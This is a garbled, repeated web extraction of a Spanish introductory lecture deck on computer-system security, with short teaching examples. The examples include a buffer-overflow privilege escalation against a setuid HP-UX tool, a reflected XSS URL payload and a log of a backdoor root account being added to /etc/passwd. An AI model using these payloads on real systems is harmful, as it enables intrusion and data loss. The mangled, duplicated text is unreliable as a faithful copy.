una introducción a la seguridad en sistemas...

41
J.A. Gutiérrez <[email protected]> <http://webdiis.unizar.es/~spd/seguridad.pdf> Una Introducción a la Seguridad en Sistemas Informáticos

Upload: others

Post on 31-Aug-2019

4 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

JA Gutieacuterrez ltjagutierrezunizaresgtlthttpwebdiisunizares~spdseguridadpdfgt

Una Introduccioacuten a la Seguridad en Sistemas

Informaacuteticos

1 iquestQueacute significa ldquoProblema de Seguridadrdquo

2 iquestLos sistemas son seguros

3 Razones de la inseguridad

1 En internet

2 En redes

3 En ordenadores

4 En usuarios

4 Consecuencias de la inseguridad

1 Sobre los ordenadores

2 Sobre los usuarios

5 Tipos de ldquoProblemas de Seguridadrdquo

1 Clasificaciones sistemaacuteticas

2 Por los meacutetodos de acceso

3 Por el origen del acceso

4 Por el atacante

6 Evolucioacuten de la inseguridad

7 Tipos de usuarios

Exposicioacuten del problema

Posibles soluciones

1 Conceptos baacutesicos en el estudio de la seguridad

1 Fallos tiacutepicos en Sistemas Operativos

2 Fallos tiacutepicos en clientes

2 Medidas de seguridad

1 A nivel de usuario

2 A nivel de adminstracioacuten

3 Ejemplos

1 Errores de programas

2 Dispositivos

3 XSS

4 Varios

5 Intrusioacuten real

4 Recursos

bull Aquellos que comprometen la integridad o la privacidad de los datos almacenados

bull Aquellos que permiten acceso a recursos supuestamente no permitidos

bull Aquellos que impiden el acceso a recursos a usuarios legiacutetimos

bull Aquellos que permiten hacer un mal uso de los recursos informaacuteticos

iquestQueacute es ldquoProblema de Seguridadrdquo

bull Virus informaacuteticos Troyanos Gusanos

bull Paacuteginas web ldquohostilesrdquo

bull ldquoSpywarerdquo

bull Entradas en sistemas ajenos

bull Robo de datos bancarios

bull Cambio de paacuteginas Web

bull Ataques DoS a nivel mundial

iquestLos sistemas son seguros

lthttpwwwiwarorgukiwarresourcestreatise-on-iwiwhtmgt

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 2: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

1 iquestQueacute significa ldquoProblema de Seguridadrdquo

2 iquestLos sistemas son seguros

3 Razones de la inseguridad

1 En internet

2 En redes

3 En ordenadores

4 En usuarios

4 Consecuencias de la inseguridad

1 Sobre los ordenadores

2 Sobre los usuarios

5 Tipos de ldquoProblemas de Seguridadrdquo

1 Clasificaciones sistemaacuteticas

2 Por los meacutetodos de acceso

3 Por el origen del acceso

4 Por el atacante

6 Evolucioacuten de la inseguridad

7 Tipos de usuarios

Exposicioacuten del problema

Posibles soluciones

1 Conceptos baacutesicos en el estudio de la seguridad

1 Fallos tiacutepicos en Sistemas Operativos

2 Fallos tiacutepicos en clientes

2 Medidas de seguridad

1 A nivel de usuario

2 A nivel de adminstracioacuten

3 Ejemplos

1 Errores de programas

2 Dispositivos

3 XSS

4 Varios

5 Intrusioacuten real

4 Recursos

bull Aquellos que comprometen la integridad o la privacidad de los datos almacenados

bull Aquellos que permiten acceso a recursos supuestamente no permitidos

bull Aquellos que impiden el acceso a recursos a usuarios legiacutetimos

bull Aquellos que permiten hacer un mal uso de los recursos informaacuteticos

iquestQueacute es ldquoProblema de Seguridadrdquo

bull Virus informaacuteticos Troyanos Gusanos

bull Paacuteginas web ldquohostilesrdquo

bull ldquoSpywarerdquo

bull Entradas en sistemas ajenos

bull Robo de datos bancarios

bull Cambio de paacuteginas Web

bull Ataques DoS a nivel mundial

iquestLos sistemas son seguros

lthttpwwwiwarorgukiwarresourcestreatise-on-iwiwhtmgt

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 3: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Posibles soluciones

1 Conceptos baacutesicos en el estudio de la seguridad

1 Fallos tiacutepicos en Sistemas Operativos

2 Fallos tiacutepicos en clientes

2 Medidas de seguridad

1 A nivel de usuario

2 A nivel de adminstracioacuten

3 Ejemplos

1 Errores de programas

2 Dispositivos

3 XSS

4 Varios

5 Intrusioacuten real

4 Recursos

bull Aquellos que comprometen la integridad o la privacidad de los datos almacenados

bull Aquellos que permiten acceso a recursos supuestamente no permitidos

bull Aquellos que impiden el acceso a recursos a usuarios legiacutetimos

bull Aquellos que permiten hacer un mal uso de los recursos informaacuteticos

iquestQueacute es ldquoProblema de Seguridadrdquo

bull Virus informaacuteticos Troyanos Gusanos

bull Paacuteginas web ldquohostilesrdquo

bull ldquoSpywarerdquo

bull Entradas en sistemas ajenos

bull Robo de datos bancarios

bull Cambio de paacuteginas Web

bull Ataques DoS a nivel mundial

iquestLos sistemas son seguros

lthttpwwwiwarorgukiwarresourcestreatise-on-iwiwhtmgt

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 4: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Aquellos que comprometen la integridad o la privacidad de los datos almacenados

bull Aquellos que permiten acceso a recursos supuestamente no permitidos

bull Aquellos que impiden el acceso a recursos a usuarios legiacutetimos

bull Aquellos que permiten hacer un mal uso de los recursos informaacuteticos

iquestQueacute es ldquoProblema de Seguridadrdquo

bull Virus informaacuteticos Troyanos Gusanos

bull Paacuteginas web ldquohostilesrdquo

bull ldquoSpywarerdquo

bull Entradas en sistemas ajenos

bull Robo de datos bancarios

bull Cambio de paacuteginas Web

bull Ataques DoS a nivel mundial

iquestLos sistemas son seguros

lthttpwwwiwarorgukiwarresourcestreatise-on-iwiwhtmgt

iquestLos sistemas son seguros

lthttpwwwcertorgstatsgt

1988

1989

1990

1991

1992

1993

1994

1995

1996

1997

1998

1999

2000

2001

2002

2003

0

37500

75000

112500

150000Incidentes (CERT)

1995

1996

1997

1998

1999

2000

2001

2002

2003

2004

2005

2006

0

2125

4250

6375

8500Vulnerabilidades sobre las que se ha informado (CERT)

iquestLos sistemas son seguros

Nuacutemero de incidentes sufridos por organizacioacuten 2004 E-Crime Watch Survey

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

